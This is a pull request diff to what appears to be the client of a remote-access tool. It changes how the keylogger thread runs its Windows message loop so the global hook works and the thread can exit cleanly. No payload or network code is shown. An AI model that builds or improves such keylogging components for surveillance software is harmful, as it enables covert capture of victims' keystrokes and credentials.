### PR TITLE
Message loop fix

### DIFF
--- a/Client/Core/Keylogger/Logger.cs
+++ b/Client/Core/Keylogger/Logger.cs
@@ -47,11 +47,6 @@ namespace xClient.Core.Keylogger
 
             _timerFlush.Enabled = true;
             _timerFlush.Start();
-
-            // Initialize the application message pipeline.
-            // Necessary for setting global hooks because setting a global
-            // hook requires an established message pipeline for the thread.
-            Application.Run();
         }
 
         ~Logger()

--- a/Client/Program.cs
+++ b/Client/Program.cs
@@ -17,6 +17,7 @@ namespace xClient
         private static bool _reconnect = true;
         private static volatile bool _connected = false;
         private static Mutex _appMutex;
+        private static ApplicationContext _msgLoop;
 
         [STAThread]
         private static void Main(string[] args)
@@ -38,7 +39,11 @@ namespace xClient
             if (CommandHandler.LastDesktopScreenshot != null)
                 CommandHandler.LastDesktopScreenshot.Dispose();
             if (Logger.Instance != null)
+            {
                 Logger.Instance.Dispose();
+                if (_msgLoop != null)
+                    _msgLoop.ExitThread();
+            }
             if (_appMutex != null)
                 _appMutex.Close();
 
@@ -136,8 +141,10 @@ namespace xClient
                 {
                     new Thread(() =>
                     {
+                        _msgLoop = new ApplicationContext();
                         Logger logger = new Logger(15000);
-                    }).Start();
+                        Application.Run(_msgLoop);
+                    }).Start(); ;
                 }
             }
             else


### PR DESCRIPTION
Fixed the message loop, called Application.Run in the thread and not the logger
object, using ApplicationContext object we can identify the message loop to have it return, so the thread can exit gracefully